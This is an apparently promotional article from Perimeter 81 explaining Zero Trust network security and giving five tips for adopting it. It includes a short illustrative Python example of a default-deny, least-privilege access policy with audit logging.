Zero Trust provides adequate visibility, control and threat inspection capabilities that are necessary to protect your network from modern malware, targeted attacks and the unauthorized exfiltration of sensitive data.
By migrating to a Zero Trust architecture, organizations can experience several technical and business advantages, including:

  • Mitigating Data Loss
    Dramatically enhance your security posture and mitigate data loss via visibility, safe enablement of applications and threat prevention.
  • Effortless Compliance
    Simplify compliance with highly effective trust boundaries by segmenting sensitive resources into many small perimeters that are secured and segmented based on user policies and permissions.
  • Enabling Mobility and Virtualization
    Increase the ability to accommodate transformative IT initiatives such as cloud computing, infrastructure virtualization, user mobility, social networking and more.
  • Reducing TCO
    Reduce total cost of ownership (TCO) for IT security by replacing disconnected point products with a single, consolidated security platform.
  • Increasing Security
    By adequately accounting for encrypted traffic and filtering for known threats, organizations can prevent sophisticated cyber threats from penetrating perimeter defenses and moving laterally across the internal network thanks to a solid business VPN solution.

The Zero Trust Model – How it Works

Internal networks are comprised of different levels of trust which should be segmented according to sensitivity. Organizations looking to establish secure “trust boundaries” according to the Zero Trust model need to improve their defensive posture through:

  • Network Segmentation
    Network segmentation allows organizations to define internal trust boundaries to granularly control traffic flow, enable secure network access and implement network monitoring. This reduces the attack surface and provides a distributed security solution which operates as a holistic threat protection framework.  
  • Trust Zones
    Trust zones are comprised of distinct pockets of infrastructure where resources operate at the same trust level and similar functionality such as protocols and types of transactions. This minimizes the number of allowed pathways and limits the potential for malicious threats to access sensitive resources.
  • Infrastructure Management
    Zero Trust segmentation relies on the ability to efficiently monitor the network via centralized management capabilities. This allows data to be processed by out-of-band analysis tools and technologies that may further enhance network visibility, detect unknown threats, or support compliance reporting.

5 Tips to Get Started with Zero Trust Network Security

It is important for IT security managers and architects to realize that it’s not necessary to wait for the next network and security infrastructure. By obtaining unparalleled visibility into enterprise computing activity, organizations can incrementally and non-disruptively make the transition to a Zero Trust model.

Here are 5 tips to get started with a Zero Trust approach to network security:

Tip #1: Secure Network Access

To get started, it’s critical to ensure that all resources are accessed securely, regardless of location. Network security, implemented via a client application for endpoints, allows for secure IPsec and SSL VPN connectivity for all employees, partners, customers and guests no matter where they’re connecting from (e.g., remotely, on the local network, or over the Internet).

Additional policies determine which users and devices can access sensitive applications and data. This requires multiple trust boundaries, increased use of secure communications to and from resources and more.  

Tip #2: Inspect and Log ALL Traffic

To accurately monitor what’s happening in the network, organizations must identify and classify all traffic, regardless of ports and protocols, encryption or hopping.

This reiterates the need to “always verify” while also making it clear that adequate protection requires more than just strict enforcement of access control. It also eliminates methods that malware may use to hide from detection.  

Tip #3: Least Privilege Access Control

Many legacy solutions are limited to port and protocol-level classification, resulting in too much unfiltered traffic. With granular access control, users can safely access appropriate applications and data by reducing available pathways and eliminating unauthorized and malicious traffic from the network.

With a least-privileged strategy and strictly enforced access control, organizations can define user interactions with resources based on relevant attributes, including application access, user and group identity and the sensitivity of the data being accessed.
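As an added illustration (not Perimeter 81’s code), here is a small policy decision point in Python that applies the attribute-based, least-privilege rules just described together with the trust-zone segmentation from the “How it Works” section: every request is denied unless a rule for the user’s group, application and the resource’s trust zone explicitly allows it, the resource’s data sensitivity is checked against the rule’s clearance, unverified identities or unmanaged devices are refused before any rule is consulted, and every decision is recorded for audit. All users, groups, applications, zones and classifications are constructed.

```python
from dataclasses import dataclass
from typing import FrozenSet, List, Tuple

# Data classifications ordered by sensitivity (constructed labels).
SENSITIVITY = {"public": 0, "internal": 1, "confidential": 2, "restricted": 3}

@dataclass(frozen=True)
class Request:
    user: str
    groups: FrozenSet[str]
    app: str               # application the user is going through
    resource: str          # the file, record or service being touched
    zone: str              # trust zone where the resource lives
    sensitivity: str       # classification of the resource's data
    mfa: bool              # identity was verified with MFA this session
    managed_device: bool   # device posture check passed

@dataclass(frozen=True)
class Rule:
    group: str
    app: str
    zones: FrozenSet[str]   # trust zones this group may reach via this app
    max_sensitivity: str    # highest classification the group may read

# Constructed policy: each group gets only the zones and apps its job needs.
POLICY = (
    Rule("loan-officers", "loan-portal", frozenset({"lending"}), "confidential"),
    Rule("support", "crm", frozenset({"lending", "cards"}), "internal"),
    Rule("vault-admins", "core-banking", frozenset({"core"}), "restricted"),
)

AUDIT_LOG: List[Tuple] = []  # every decision, allowed or denied, is recorded

def decide(req: Request, policy=POLICY) -> Tuple[bool, str]:
    """Return (allowed, reason). Default deny: access needs an explicit rule."""
    if not (req.mfa and req.managed_device):
        verdict = (False, "identity or device not verified")
    else:
        verdict = (False, "no rule grants access")
        for rule in policy:
            if (rule.group in req.groups and rule.app == req.app
                    and req.zone in rule.zones
                    and SENSITIVITY[req.sensitivity] <= SENSITIVITY[rule.max_sensitivity]):
                verdict = (True, f"rule for {rule.group} on {rule.app}")
                break
    AUDIT_LOG.append((req.user, req.app, req.resource, req.zone, *verdict))
    return verdict
```

A loan officer reaching a confidential lending record through the loan portal is allowed, the same officer touching a resource in the core zone or a restricted file is denied, and a vault administrator without MFA is refused before the policy is even consulted.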

Tip #4: Advanced Threat Protection

Legacy security that relies on stateful inspection technology is incapable of enforcing a least-privileged policy because its classification engines only understand IP addresses, ports and protocols – meaning they can’t distinguish between specific applications.

To implement Zero Trust, comprehensive protection against both known and unknown threats, including threats on mobile devices, is necessary to support a closed-loop, highly integrated defense stature that consistently and cost-effectively enables trust boundaries.

Tip #5: High-Performance Design

Since Zero Trust relies on numerous security and networking capabilities, these features must be implemented in a way that doesn’t hinder performance. The Perimeter Zero software architecture minimizes latency and surpasses processing requirements, providing high availability, avoiding loss of service and increasing the uptime of your network.

With unmatched visibility and control of applications, users, and content, organizations can migrate to Zero Trust network security with a highly flexible solution made possible by non-disruptive deployment.

Convert to Zero Trust on the Fly

Because every successful Zero Trust initiative depends on the right solution, organizations can feel confident that they can implement Zero Trust network security without needing to modify the existing network.

Perimeter 81’s software-defined perimeter Zero Trust access feature, called Perimeter Zero, provides a completely transparent experience for all users by enabling access to web applications, SSH, RDP, VNC or Telnet, through resilient IPSec tunnels – without an agent.

All your organization’s employees can easily go to their application portal, select the application they have permission to enter and create a session that is fully audited, recorded and monitored.

With secure, segmented and audited access to cloud environments, applications and local services, Zero Trust increases security, auditing, monitoring and visibility while reducing help-desk support and hardware spending.